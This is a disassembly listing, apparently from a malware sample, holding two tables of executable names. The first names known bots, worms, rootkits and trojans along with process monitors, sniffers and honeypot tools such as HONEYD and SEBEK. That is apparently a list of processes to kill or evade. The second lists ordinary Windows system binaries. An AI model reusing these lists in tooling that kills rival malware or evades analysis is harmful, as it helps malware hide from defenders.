dd offset aWuaumqr1_exe ; "WUAUMQR1.EXE"
dd offset aQtask_exe ; "QTASK.EXE"
dd offset aSmsc_exe ; "SMSC.EXE"
dd offset aCmh_exe ; "CMH.EXE"
dd offset aTskmagr_exe ; "TSKMAGR.EXE"
dd offset aEraseme_exe ; "ERASEME.EXE"
dd offset aMessengerr_exe ; "MESSENGERR.EXE"
dd offset aQkkku_exe ; "QKKKU.EXE"
dd offset aWindowsvista_e ; "WINDOWSVISTA.EXE"
dd offset aMswins_exe ; "MSWINS.EXE"
dd offset aMyhost_exe ; "MYHOST.EXE"
dd offset aBsdmpldrvr642_ ; "BSDMPLDRVR642.EXE"
dd offset aRp5_exe ; "RP5.EXE"
dd offset aSvcvhost_exe ; "SVCVHOST.EXE"
dd offset aJswtss_exe ; "JSWTSS.EXE"
dd offset aWaucult_exe ; "WAUCULT.EXE"
dd offset aMsssmsngr6417_ ; "MSSSMSNGR6417.EXE"
dd offset aWinmpat_exe ; "WINMPAT.EXE"
dd offset aSvhostcs32_exe ; "SVHOSTCS32.EXE"
dd offset aWinpooch_exe ; "WINPOOCH.EXE"
dd offset aRundil_exe ; "RUNDIL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aAg_exe ; "AG.EXE"
dd offset aA_bat ; "A.BAT"
dd offset aHbot_exe ; "HBOT.EXE"
dd offset aDbot_exe ; "DBOT.EXE"
dd offset aZz_exe ; "ZZ.EXE"
dd offset aTcpview_exe ; "TCPVIEW.EXE"
dd offset aTcpviewpro_exe ; "TCPVIEWPRO.EXE"
dd offset aTcpdump_exe ; "TCPDUMP.EXE"
dd offset aTcpmon_exe ; "TCPMON.EXE"
dd offset aTcpstat_exe ; "TCPSTAT.EXE"
dd offset aTcpstats_exe ; "TCPSTATS.EXE"
dd offset aSharemon_exe ; "SHAREMON.EXE"
dd offset aHostmon_exe ; "HOSTMON.EXE"
dd offset aWinsniff_exe ; "WINSNIFF.EXE"
dd offset aRegmon_exe ; "REGMON.EXE"
dd offset aProcexp_exe ; "PROCEXP.EXE"
dd offset aPortmon_exe ; "PORTMON.EXE"
dd offset aFilemon_exe ; "FILEMON.EXE"
dd offset aFport_exe ; "FPORT.EXE"
dd offset aTlist_exe ; "TLIST.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcdump32_exe ; "PROCDUMP32.EXE"
dd offset aPexplorer_exe ; "PEXPLORER.EXE"
dd offset aNetworkactivpi ; "NETWORKACTIVPIAFCTMV1.5.EXE"
dd offset aXdcc_install_e ; "XDCC_INSTALL.EXEDD.EXE"
dd offset aAoautoupdatena ; "AOAUTOUPDATENAV.EXE"
dd offset aCash_exe ; "CASH.EXE"
dd offset a0cash_exe ; "0CASH.EXE"
dd offset aCash7oc_jpg ; "CASH7OC.JPG"
dd offset aLogix_exe ; "LOGIX.EXE"
dd offset a2pac_exe ; "2PAC.EXE"
dd offset aOp_exe ; "OP.EXE"
dd offset aOoooo_exe ; "OOOOO.EXE"
dd offset aOooo_exe ; "OOOO.EXE"
dd offset aDgjdjg_exe ; "DGJDJG.EXE"
dd offset aArabz_exe ; "ARABZ.EXE"
dd offset aArabian_exe ; "ARABIAN.EXE"
dd offset aTbar_exe ; "TBAR.EXE"
dd offset aPusu_exe ; "PUSU.EXE"
dd offset aNaab_exe ; "NAAB.EXE"
dd offset aFtpit_exe ; "FTPIT.EXE"
dd offset aIcmd_exe ; "ICMD.EXE"
dd offset aXssh_exe ; "XSSH.EXE"
dd offset aTcpshell_exe ; "TCPSHELL.EXE"
dd offset aHidden32_exe ; "HIDDEN32.EXE"
dd offset aHiderun_exe ; "HIDERUN.EXE"
dd offset aHidden32_exe ; "HIDDEN32.EXE"
dd offset aHidden_exe ; "HIDDEN.EXE"
dd offset aHide_exe ; "HIDE.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aBlast_exe ; "BLAST.EXE"
dd offset aSasser_exe ; "SASSER.EXE"
dd offset aSassere_exe ; "SASSERE.EXE"
dd offset aScrhost32_exe ; "SCRHOST32.EXE"
dd offset aWuamgrd_exe ; "WUAMGRD.EXE"
dd offset aWuamgre_exe ; "WUAMGRE.EXE"
dd offset aWins32_exe ; "WINS32.EXE"
dd offset aZfr_exe ; "ZFR.EXE"
dd offset aZf_exe ; "ZF.EXE"
dd offset aSvchost32_exe ; "SVCHOST32.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aIexpl0re_exe ; "IEXPL0RE.EXE"
dd offset aSvcost_exe ; "SVCOST.EXE"
dd offset aSvhost_exe ; "SVHOST.EXE"
dd offset aSvhosts_exe ; "SVHOSTS.EXE"
dd offset aSvch0st32_exe ; "SVCH0ST32.EXE"
dd offset aScrh0st_exe ; "SCRH0ST.EXE"
dd offset aWuamkoppnp_exe ; "WUAMKOPPNP.EXE"
dd offset aSpoolss_exe ; "SPOOLSS.EXE"
dd offset aSysinfo_exe ; "SYSINFO.EXE"
dd offset aAddiq32_exe ; "ADDIQ32.EXE"
dd offset aNtsf_exe ; "NTSF.EXE"
dd offset aWindows_update ; "WINDOWS_UPDATER01.EXE"
dd offset aQq_exe ; "QQ.EXE"
dd offset aIexploree_exe ; "IEXPLOREE.EXE"
dd offset aCrss32_exe ; "CRSS32.EXE"
dd offset aSpool32_exe ; "SPOOL32.EXE"
dd offset aSpools32_exe ; "SPOOLS32.EXE"
dd offset aRun0nce_exe ; "RUN0NCE.EXE"
dd offset aMsdev32_exe ; "MSDEV32.EXE"
dd offset aPostcard_exe ; "POSTCARD.EXE"
dd offset aFoods_exe ; "FOODS.EXE"
dd offset aMswin32 ; "MSWIN32"
dd offset aHide_exe ; "HIDE.EXE"
dd offset aTaskhider_exe ; "TASKHIDER.EXE"
dd offset aNi_exe ; "NI.EXE"
dd offset aRview_exe ; "RVIEW.EXE"
dd offset aRadmin21_exe ; "RADMIN21.EXE"
dd offset aRadmin22_exe ; "RADMIN22.EXE"
dd offset aWsg32_exe ; "WSG32.EXE"
dd offset aXtc_exe ; "XTC.EXE"
dd offset aCiao_exe ; "CIAO.EXE"
dd offset aRdr32_exe ; "RDR32.EXE"
dd offset aWrapper_exe ; "WRAPPER.EXE"
dd offset aStub_exe ; "STUB.EXE"
dd offset aTemp_exe ; "TEMP.EXE"
dd offset aDftpd_exe ; "DFTPD.EXE"
dd offset aWinmaster_exe ; "WINMASTER.EXE"
dd offset aSlave_exe ; "SLAVE.EXE"
dd offset aSlave32_exe ; "SLAVE32.EXE"
dd offset aWinslave_exe ; "WINSLAVE.EXE"
dd offset aKralor_exehaxo ; "KRALOR.EXEHAXOR.EXE"
dd offset aMykralor_exe ; "MYKRALOR.EXE"
dd offset aAcc3pt_exe ; "ACC3PT.EXE"
dd offset aBeast_exe ; "BEAST.EXE"
dd offset aTq_exe ; "TQ.EXE"
dd offset aVirus_exe ; "VIRUS.EXE"
dd offset aVirus32_exe ; "VIRUS32.EXE"
dd offset aHoneyd_exe ; "HONEYD.EXE"
dd offset aHoneywall_exe ; "HONEYWALL.EXE"
dd offset aSebek_exe ; "SEBEK.EXE"
dd offset aSelebek_exe ; "SELEBEK.EXE"
dd offset aAntibotty_exe ; "ANTIBOTTY.EXE"
dd offset aSysd32_exe ; "SYSD32.EXE"
dd offset aRoo_exe ; "ROO.EXE"
dd offset aRoo32_exe ; "ROO32.EXE"
dd offset aHoney_exe ; "HONEY.EXE"
dd offset aTrojan_exe ; "TROJAN.EXE"
dd offset aSub7_exe ; "SUB7.EXE"
dd offset aBd_exe ; "BD.EXE"
dd offset aDoor_exe ; "DOOR.EXE"
dd offset aOmfglol_exe ; "OMFGLOL.EXE"
dd offset aOwned_exe ; "OWNED.EXE"
dd offset a1_exe ; "1.EXE"
dd offset a6_exe ; "6.EXE"
dd offset aDiablo_exe ; "DIABLO.EXE"
dd offset aDiabl0_exe ; "DIABL0.EXE"
dd offset aRunthis_exe ; "RUNTHIS.EXE"
dd offset aKit_exe ; "KIT.EXE"
dd offset aXdcckit_exe ; "XDCCKIT.EXE"
dd offset aXd_exe ; "XD.EXE"
dd offset aIcmd_exe ; "ICMD.EXE"
dd offset aHxdef100_exe ; "HXDEF100.EXE"
dd offset aBdcli100_exe ; "BDCLI100.EXE"
dd offset aRdrbs100_exe ; "RDRBS100.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aHxgold_exe ; "HXGOLD.EXE"
dd offset aHxdef073_exe ; "HXDEF073.EXE"
dd offset aBdcli073_exe ; "BDCLI073.EXE"
dd offset aRdrbs073_exe ; "RDRBS073.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aKeylogger_exe ; "KEYLOGGER.EXE"
dd offset aKeylog_exe ; "KEYLOG.EXE"
dd offset aKeylogg_exe ; "KEYLOGG.EXE"
dd offset aDrweb32_exe ; "DRWEB32.EXE"
dd offset aMsantispy_exe ; "MSANTISPY.EXE"
dd offset aAntispy_exe ; "ANTISPY.EXE"
dd offset aWinmrt_exe ; "WINMRT.EXE"
dd offset aWinmrt32_exe ; "WINMRT32.EXE"
dd offset aRcc_exe ; "RCC.EXE"
dd offset aIroffer_exe ; "IROFFER.EXE"
dd offset aIrbot_exe ; "IRBOT.EXE"
dd offset aOffer_exe ; "OFFER.EXE"
dd offset aIrxdcc_exe ; "IRXDCC.EXE"
dd offset aSdbot_exe ; "SDBOT.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aSdbot05b_exe ; "SDBOT05B.EXE"
dd offset aSdbot05c_exe ; "SDBOT05C.EXE"
dd offset aT_bat ; "T.BAT"
dd offset aHax_exe ; "HAX.EXE"
dd offset aMsn_exe ; "MSN.EXE"
dd offset a101_exe ; "101.EXE"
dd offset aClass101_exe ; "CLASS101.EXE"
dd offset aSocks_exe ; "SOCKS.EXE"
dd offset aSox_exe ; "SOX.EXE"
dd offset aSockets_exe ; "SOCKETS.EXE"
dd offset aS0cks_exe ; "S0CKS.EXE"
dd offset aMsserv_exe ; "MSSERV.EXE"
dd offset aConvertxdccfil ; "CONVERTXDCCFILE.EXE"
dd offset aWinreg32_exe ; "WINREG32.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aXftp_exe ; "XFTP.EXE"
dd offset aWebx_exe ; "WEBX.EXE"
dd offset aWebdownloader_ ; "WEBDOWNLOADER.EXE"
dd offset aSyst3m33r_exe ; "SYST3M33R.EXE"
dd offset aAgobot_exe ; "AGOBOT.EXE"
dd offset aAgobot3_exe ; "AGOBOT3.EXE"
dd offset aPhatbot_exe ; "PHATBOT.EXE"
dd offset aA_exe ; "A.EXE"
dd offset aAgo_exe ; "AGO.EXE"
dd offset aAg_exe ; "AG.EXE"
dd offset aAg32_exe ; "AG32.EXE"
dd offset aPb_exe ; "PB.EXE"
dd offset aWonk_exe ; "WONK.EXE"
dd offset aAgobotsvc_exe ; "AGOBOTSVC.EXE"
dd offset aForbot_exe ; "FORBOT.EXE"
dd offset aUrxbot_exe ; "URXBOT.EXE"
dd offset aAsn_exe ; "ASN.EXE"
dd offset aPnp_exe ; "PNP.EXE"
dd offset aUrx_exe ; "URX.EXE"
dd offset aDowner_exe ; "DOWNER.EXE"
dd offset aWebex_exe ; "WEBEX.EXE"
dd offset aLoader32_exe ; "LOADER32.EXE"
dd offset aRunbatch_exe ; "RUNBATCH.EXE"
dd offset aGsec_exe ; "GSEC.EXE"
dd offset aWindll_exe ; "WINDLL.EXE"
dd offset aDllhst_exe ; "DLLHST.EXE"
dd offset aWinhelp_exe_0 ; "WINHELP.EXE"
dd offset aExe_exe ; "EXE.EXE"
dd offset aExe32_exe ; "EXE32.EXE"
dd offset aUpdates_exe ; "UPDATES.EXE"
dd offset aT00lkit_exe ; "T00LKIT.EXE"
dd offset aRootkit_exe ; "ROOTKIT.EXE"
dd offset aRk_exe ; "RK.EXE"
dd offset aR00tkit_exe ; "R00TKIT.EXE"
dd offset aUtils32_exe ; "UTILS32.EXE"
dd offset aUniversal_exe ; "UNIVERSAL.EXE"
dd offset aDcomd_exe ; "DCOMD.EXE"
dd offset aDcz_exe ; "DCZ.EXE"
dd offset aDc_exe ; "DC.EXE"
dd offset aAkbot_exe ; "AKBOT.EXE"
dd offset aSxot_exe ; "SXOT.EXE"
dd offset aMssql32_exe ; "MSSQL32.EXE"
dd offset aSsql_exe ; "SSQL.EXE"
dd offset aWinsocket_exe ; "WINSOCKET.EXE"
dd offset aWinupdaterar_e ; "WINUPDATERAR.EXE"
dd offset aWmism23_exe ; "WMISM23.EXE"
dd offset aSysmgr64_exe ; "SYSMGR64.EXE"
dd offset aWebmsn_exe ; "WEBMSN.EXE"
dd offset aWanmpsvc_exe ; "WANMPSVC.EXE"
dd offset aEbay_exe ; "EBAY.EXE"
dd offset aWinsnte_exe ; "WINSNTE.EXE"
dd offset aWinpkr_exe ; "WINPKR.EXE"
dd offset aMswdns32_exe ; "MSWDNS32.EXE"
dd offset aBulk_exe ; "BULK.EXE"
dd offset aBlkl_exe ; "BLKL.EXE"
dd offset aIs67538_exe ; "IS67538.EXE"
dd offset aVideoati0_exe ; "VIDEOATI0.EXE"
dd offset aSpooisv_exe ; "SPOOISV.EXE"
dd offset aWiniogon_exe ; "WINIOGON.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aWinuppd_exe ; "WINUPPD.EXE"
dd offset aWinclean_exe ; "WINCLEAN.EXE"
dd offset aDisk10_exe ; "DISK10.EXE"
dd offset aW32sim_exe ; "W32SIM.EXE"
dd offset aWishs_exewsemg ; "WISHS.EXEWSEMGR.EXE"
dd offset aWnetwork_exe ; "WNETWORK.EXE"
dd offset aOwnt_exe ; "OWNT.EXE"
dd offset aUay_exe ; "UAY.EXE"
dd offset aHookiat_exe ; "HOOKIAT.EXE"
dd offset aJoined_exe ; "JOINED.EXE"
dd offset aRserver_exe ; "RSERVER.EXE"
dd offset aHtran_v1_exe ; "HTRAN_V1.EXE"
dd offset aBlkl_exe ; "BLKL.EXE"
dd offset aBox_exe ; "BOX.EXE"
dd offset aLam_exe ; "LAM.EXE"
dd offset aAbo_exe ; "ABO.EXE"
dd offset aLoadadv735_exe ; "LOADADV735.EXE"
dd offset aM_exe ; "M.EXE"
dd offset aNope_exe ; "NOPE.EXE"
dd offset aGt_exe ; "GT.EXE"
dd offset aNxm_exe ; "NXM.EXE"
dd offset aDual_exe ; "DUAL.EXE"
dd offset a5h7h8v6b1c5_ex ; "5H7H8V6B1C5.EXE"
dd offset aTamer_bat_exe ; "TAMER.BAT.EXE"
dd offset aOf_exe ; "OF.EXE"
dd offset aO1o2o3o4_exe ; "O1O2O3O4.EXE"
dd offset aOurnik_exe ; "OURNIK.EXE"
dd offset aPs2m_exe ; "PS2M.EXE"
dd offset aSecuraq_exe ; "SECURAQ.EXE"
dd offset aScans_exe ; "SCANS.EXE"
dd offset aTest_exe ; "TEST.EXE"
dd offset aKa6ber_exe ; "KA6BER.EXE"
dd offset aV1rg1n_exe_0 ; "V1Rg1N.EXE"
dd offset aU_exe ; "U.EXE"
dd offset aV1rgf_exe ; "V1RGF.EXE"
dd offset aJssa_exe ; "JSSA.EXE"
dd offset aAdv693_exe ; "ADV693.EXE"
dd offset aXgun_exe ; "XGUN.EXE"
dd offset aRopnc_exe ; "ROPNC.EXE"
dd offset aV1rg1n_exe ; "V1RG1N.EXE"
dd offset aIrb_exe ; "IRB.EXE"
dd offset aRspool_exe ; "RSPOOL.EXE"
dd offset aDmi_exe ; "DMI.EXE"
dd offset aWqrtuhx_exe ; "WQRTUHX.EXE"
dd offset aWinpga_exe ; "WINPGA.EXE"
dd offset aHz_exe ; "HZ.EXE"
dd offset aWolff_exe ; "WOLFF.EXE"
dd offset aA_exe ; "A.EXE"
dd offset aGg_exe ; "GG.EXE"
dd offset aWebxgrab_exe ; "WEBXGRAB.EXE"
dd offset aLogdec_exe ; "LOGDEC.EXE"
dd offset aLogoner_exe ; "LOGONER.EXE"
dd offset aRun_bot_bat_ex ; "RUN_BOT.BAT.EXE"
dd offset aRootkit2_exe ; "ROOTKIT2.EXE"
dd offset aMsnet_bat ; "MSNET.BAT"
dd offset aWsg32_exe ; "WSG32.EXE"
dd offset aDog_bat ; "DOG.BAT"
dd offset aInssvc_exe ; "INSSVC.EXE"
dd offset aConvertxdccfil ; "CONVERTXDCCFILE.EXE"
dd offset aNsecurity_exe ; "NSECURITY.EXE"
dd offset aDup_exe ; "DUP.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aWindows12_exe ; "WINDOWS12.EXE"
dd offset aMssmpp_exe ; "MSSMPP.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
align 8
off_448918 dd offset dword_4439A8 ; DATA XREF: sub_41F0F5+142�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aNview_exe ; "nview.exe"
dd offset aSview_exe ; "sview.exe"
dd offset aNvuninst_exe ; "NVUNINST.EXE"
dd offset aNvsvc32_exe ; "nvsvc32.exe"
dd offset aNvudisp_exe ; "nvudisp.exe"
dd offset aNvappbar_exe ; "nvappbar.exe"
dd offset aNvcolor_exe ; "nvcolor.exe"
dd offset aNvdspsch_exe ; "nvdspsch.exe"
dd offset aNvcplui_exe ; "nvcplui.exe"
dd offset aNwiz_exe ; "nwiz.exe"
dd offset aKeystone_exe ; "keystone.exe"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aAccwiz_exe ; "accwiz.exe"
dd offset aActmovie_exe ; "actmovie.exe"
dd offset aAhui_exe ; "ahui.exe"
dd offset aAlg_exe ; "alg.exe"
dd offset aAppend_exe ; "append.exe"
dd offset aArp_exe ; "arp.exe"
dd offset aAsr_fmt_exe ; "asr_fmt.exe"
dd offset aAsr_ldm_exe ; "asr_ldm.exe"
dd offset aAsr_pfu_exe ; "asr_pfu.exe"
dd offset aAt_exe ; "at.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aAti2mdxx_exe ; "Ati2mdxx.exe"
dd offset aAtmadm_exe ; "atmadm.exe"
dd offset aAttrib_exe ; "attrib.exe"
dd offset aAuditusr_exe ; "auditusr.exe"
dd offset aAutochk_exe ; "autochk.exe"
dd offset aAutoconv_exe ; "autoconv.exe"
dd offset aAutofmt_exe ; "autofmt.exe"
dd offset aAutolfn_exe ; "autolfn.exe"
dd offset aBlastcln_exe ; "blastcln.exe"
dd offset aBootcfg_exe ; "bootcfg.exe"
dd offset aBootok_exe ; "bootok.exe"
dd offset aBootvrfy_exe ; "bootvrfy.exe"
dd offset aCacls_exe ; "cacls.exe"
dd offset aCalc_exe ; "calc.exe"
dd offset aCharmap_exe ; "charmap.exe"
dd offset aChcfg_exe ; "ChCfg.exe"
dd offset aChkdsk_exe ; "chkdsk.exe"
dd offset aChkntfs_exe ; "chkntfs.exe"
dd offset aCidaemon_exe ; "cidaemon.exe"
dd offset aCipher_exe ; "cipher.exe"
dd offset aCisvc_exe ; "cisvc.exe"
dd offset aCkcnv_exe ; "ckcnv.exe"
dd offset aCleanmgr_exe ; "cleanmgr.exe"
dd offset aCliconfg_exe ; "cliconfg.exe"
dd offset aClipbrd_exe ; "clipbrd.exe"
dd offset aClipsrv_exe ; "clipsrv.exe"
dd offset aClspack_exe ; "clspack.exe"
dd offset aCmd_exe ; "cmd.exe"
dd offset aCmdl32_exe ; "cmdl32.exe"
dd offset aCmmon32_exe ; "cmmon32.exe"
dd offset aCmstp_exe ; "cmstp.exe"
dd offset aComp_exe ; "comp.exe"
dd offset aCompact_exe ; "compact.exe"
dd offset aConime_exe ; "conime.exe"
dd offset aControl_exe ; "control.exe"
dd offset aConvert_exe ; "convert.exe"
dd offset aCscript_exe ; "cscript.exe"
dd offset aCsrss_exe ; "csrss.exe"
dd offset aCtfmon_exe ; "ctfmon.exe"
dd offset aDcomcnfg_exe ; "dcomcnfg.exe"
dd offset aDdeshare_exe ; "ddeshare.exe"
dd offset aDebug_exe ; "debug.exe"
dd offset aDefrag_exe ; "defrag.exe"
dd offset aDfrgfat_exe ; "dfrgfat.exe"
dd offset aDfrgntfs_exe ; "dfrgntfs.exe"
dd offset aDiantz_exe ; "diantz.exe"
dd offset aDiskpart_exe ; "diskpart.exe"
dd offset aDiskperf_exe ; "diskperf.exe"
dd offset aDllhost_exe ; "dllhost.exe"
dd offset aDllhst3g_exe ; "dllhst3g.exe"
dd offset aDmadmin_exe ; "dmadmin.exe"
dd offset aDmremote_exe ; "dmremote.exe"
dd offset aDoskey_exe ; "doskey.exe"
dd offset aDosx_exe ; "dosx.exe"
dd offset aDplaysvr_exe ; "dplaysvr.exe"
dd offset aDpnsvr_exe ; "dpnsvr.exe"
dd offset aDpvsetup_exe ; "dpvsetup.exe"
dd offset aDriverquery_ex ; "driverquery.exe"
dd offset aDrwatson_exe ; "drwatson.exe"
dd offset aDrwtsn32_exe ; "drwtsn32.exe"
dd offset aDumprep_exe ; "dumprep.exe"
dd offset aDvdplay_exe ; "dvdplay.exe"
dd offset aDvdupgrd_exe ; "dvdupgrd.exe"
dd offset aDwwin_exe ; "dwwin.exe"
dd offset aDxdiag_exe ; "dxdiag.exe"
dd offset aEdlin_exe ; "edlin.exe"
dd offset aEsentutl_exe ; "esentutl.exe"
dd offset aEudcedit_exe ; "eudcedit.exe"
dd offset aEventcreate_ex ; "eventcreate.exe"
dd offset aEventtriggers_ ; "eventtriggers.exe"
dd offset aEventvwr_exe ; "eventvwr.exe"
dd offset aExe2bin_exe ; "exe2bin.exe"
dd offset aExpand_exe ; "expand.exe"
dd offset aExtrac32_exe ; "extrac32.exe"
dd offset aFastopen_exe ; "fastopen.exe"
dd offset aFc_exe ; "fc.exe"
dd offset aFind_exe ; "find.exe"
dd offset aFindstr_exe ; "findstr.exe"
dd offset aFinger_exe ; "finger.exe"
dd offset aFixmapi_exe ; "fixmapi.exe"
dd offset aFltmc_exe ; "fltMc.exe"
dd offset aFontview_exe ; "fontview.exe"
dd offset aForcedos_exe ; "forcedos.exe"
dd offset aFreecell_exe ; "freecell.exe"
dd offset aFsquirt_exe ; "fsquirt.exe"
dd offset aFsutil_exe ; "fsutil.exe"
dd offset aFtp_exe ; "ftp.exe"
dd offset aGb2312_uce ; "gb2312.uce"
dd offset aGdi_exe ; "gdi.exe"
dd offset aGetmac_exe ; "getmac.exe"
dd offset aGpresult_exe ; "gpresult.exe"
dd offset aGpupdate_exe ; "gpupdate.exe"
dd offset aGrpconv_exe ; "grpconv.exe"
dd offset aHelp_exe ; "help.exe"
dd offset aHostname_exe ; "hostname.exe"
dd offset aIe4uinit_exe ; "ie4uinit.exe"
dd offset aIexpress_exe ; "iexpress.exe"
dd offset aImapi_exe ; "imapi.exe"
dd offset aIpconfig_exe ; "ipconfig.exe"
dd offset aIpsec6_exe ; "ipsec6.exe"
dd offset aIpv6_exe ; "ipv6.exe"
dd offset aIpxroute_exe ; "ipxroute.exe"
dd offset aJava_exe ; "java.exe"
dd offset aJavaw_exe ; "javaw.exe"
dd offset aJavaws_exe ; "javaws.exe"
dd offset aJdbgmgr_exe ; "jdbgmgr.exe"
dd offset aJview_exe ; "jview.exe"
dd offset aKrnl386_exe ; "krnl386.exe"
dd offset aLabel_exe ; "label.exe"
dd offset aLights_exe ; "lights.exe"
dd offset aLnkstub_exe ; "lnkstub.exe"
dd offset aLocator_exe ; "locator.exe"
dd offset aLodctr_exe ; "lodctr.exe"
dd offset aLogagent_exe ; "logagent.exe"
dd offset aLogman_exe ; "logman.exe"
dd offset aLogoff_exe ; "logoff.exe"
dd offset aLogonui_exe ; "logonui.exe"
dd offset aLpq_exe ; "lpq.exe"
dd offset aLpr_exe ; "lpr.exe"
dd offset aLsass_exe ; "lsass.exe"
dd offset aMagnify_exe ; "magnify.exe"
dd offset aMakecab_exe ; "makecab.exe"
dd offset aMem_exe ; "mem.exe"
dd offset aMigpwd_exe ; "migpwd.exe"
dd offset aMmc_exe ; "mmc.exe"
dd offset aMnmsrvc_exe ; "mnmsrvc.exe"
dd offset aMobsync_exe ; "mobsync.exe"
dd offset aMountvol_exe ; "mountvol.exe"
dd offset aMplay32_exe ; "mplay32.exe"
dd offset aMpnotify_exe ; "mpnotify.exe"
dd offset aMqbkup_exe ; "mqbkup.exe"
dd offset aMqsvc_exe ; "mqsvc.exe"
dd offset aMqtgsvc_exe ; "mqtgsvc.exe"
dd offset aMrinfo_exe ; "mrinfo.exe"
dd offset aMrt_exe ; "MRT.exe"
dd offset aMscdexnt_exe ; "mscdexnt.exe"
dd offset aMsdtc_exe ; "msdtc.exe"
dd offset aMsg_exe ; "msg.exe"
dd offset aMshearts_exe ; "mshearts.exe"
dd offset aMshta_exe ; "mshta.exe"
dd offset aMsiexec_exe ; "msiexec.exe"
dd offset aMspaint_exe ; "mspaint.exe"
dd offset aMsswchx_exe ; "msswchx.exe"
dd offset aMstinit_exe ; "mstinit.exe"
dd offset aMstsc_exe ; "mstsc.exe"
dd offset aNarrator_exe ; "narrator.exe"
dd offset aNbtstat_exe ; "nbtstat.exe"
dd offset aNddeapir_exe ; "nddeapir.exe"
dd offset aNerocheck_exe ; "NeroCheck.exe"
dd offset aNet_exe ; "net.exe"
dd offset aNet1_exe ; "net1.exe"
dd offset aNetdde_exe ; "netdde.exe"
dd offset aNetsetup_exe ; "netsetup.exe"
dd offset aNetsh_exe ; "netsh.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aNlsfunc_exe ; "nlsfunc.exe"
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aNslookup_exe ; "nslookup.exe"
dd offset aNtbackup_exe ; "ntbackup.exe"
dd offset aNtkrnlpa_exe ; "ntkrnlpa.exe"
dd offset aNtoskrnl_exe ; "ntoskrnl.exe"
dd offset aNtsd_exe ; "ntsd.exe"
dd offset aNtvdm_exe ; "ntvdm.exe"
dd offset aNw16_exe ; "nw16.exe"
dd offset aNwscript_exe ; "nwscript.exe"
dd offset aOdbcad32_exe ; "odbcad32.exe"
dd offset aOdbcconf_exe ; "odbcconf.exe"
dd offset aOpenfiles_exe ; "openfiles.exe"
dd offset aOsk_exe ; "osk.exe"
dd offset aOsuninst_exe ; "osuninst.exe"
dd offset aPackager_exe ; "packager.exe"
dd offset aPathping_exe ; "pathping.exe"
dd offset aPentnt_exe ; "pentnt.exe"
dd offset aPerfmon_exe ; "perfmon.exe"
dd offset aPing_exe ; "ping.exe"
dd offset aPing6_exe ; "ping6.exe"
dd offset aPowercfg_exe ; "powercfg.exe"
dd offset aPrint_exe ; "print.exe"
dd offset aProgman_exe ; "progman.exe"
dd offset aProquota_exe ; "proquota.exe"
dd offset aProxycfg_exe ; "proxycfg.exe"
dd offset aQappsrv_exe ; "qappsrv.exe"
dd offset aQprocess_exe ; "qprocess.exe"
dd offset aQwinsta_exe ; "qwinsta.exe"
dd offset aRasautou_exe ; "rasautou.exe"
dd offset aRasdial_exe ; "rasdial.exe"
dd offset aRasphone_exe ; "rasphone.exe"
dd offset aRcimlby_exe ; "rcimlby.exe"
dd offset aRcp_exe ; "rcp.exe"
dd offset aRdpclip_exe ; "rdpclip.exe"
dd offset aRdsaddin_exe ; "rdsaddin.exe"
dd offset aRdshost_exe ; "rdshost.exe"
dd offset aRecover_exe ; "recover.exe"
dd offset aRedir_exe ; "redir.exe"
dd offset aReg_exe ; "reg.exe"
dd offset aRegcladm_exe ; "REGCLADM.EXE"
dd offset aRegedt32_exe ; "regedt32.exe"
dd offset aRegini_exe ; "regini.exe"
dd offset aRegsvr32_exe ; "regsvr32.exe"
dd offset aRegwiz_exe ; "regwiz.exe"
dd offset aRelog_exe ; "relog.exe"
dd offset aReplace_exe ; "replace.exe"
dd offset aReset_exe ; "reset.exe"
dd offset aRexec_exe ; "rexec.exe"
dd offset aRoute_exe ; "route.exe"
dd offset aRoutemon_exe ; "routemon.exe"
dd offset aRsh_exe ; "rsh.exe"
dd offset aRsm_exe ; "rsm.exe"
dd offset aRsmsink_exe ; "rsmsink.exe"
dd offset aRsmui_exe ; "rsmui.exe"
dd offset aRsnotify_exe ; "rsnotify.exe"
dd offset aRsopprov_exe ; "rsopprov.exe"
dd offset aRsvp_exe ; "rsvp.exe"
dd offset aRtcshare_exe ; "rtcshare.exe"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aRunas_exe ; "runas.exe"
dd offset aRundll32_exe ; "rundll32.exe"
dd offset aRunonce_exe ; "runonce.exe"
dd offset aRwinsta_exe ; "rwinsta.exe"
dd offset aSavedump_exe ; "savedump.exe"
dd offset aSc_exe ; "sc.exe"
dd offset aScardsvr_exe ; "scardsvr.exe"
dd offset aSchtasks_exe ; "schtasks.exe"
dd offset aSdbinst_exe ; "sdbinst.exe"
dd offset aSecedit_exe ; "secedit.exe"
dd offset aServices_exe ; "services.exe"
dd offset aSessmgr_exe ; "sessmgr.exe"
dd offset aSethc_exe ; "sethc.exe"
dd offset aSetup_exe ; "setup.exe"
dd offset aSetver_exe ; "setver.exe"
dd offset aSfc_exe ; "sfc.exe"
dd offset aShadow_exe ; "shadow.exe"
dd offset aShare_exe ; "share.exe"
dd offset aShmgrate_exe ; "shmgrate.exe"
dd offset aShrpubw_exe ; "shrpubw.exe"
dd offset aShutdown_exe ; "shutdown.exe"
dd offset aSigverif_exe ; "sigverif.exe"
dd offset aSkeys_exe ; "skeys.exe"
dd offset aSmbinst_exe ; "smbinst.exe"
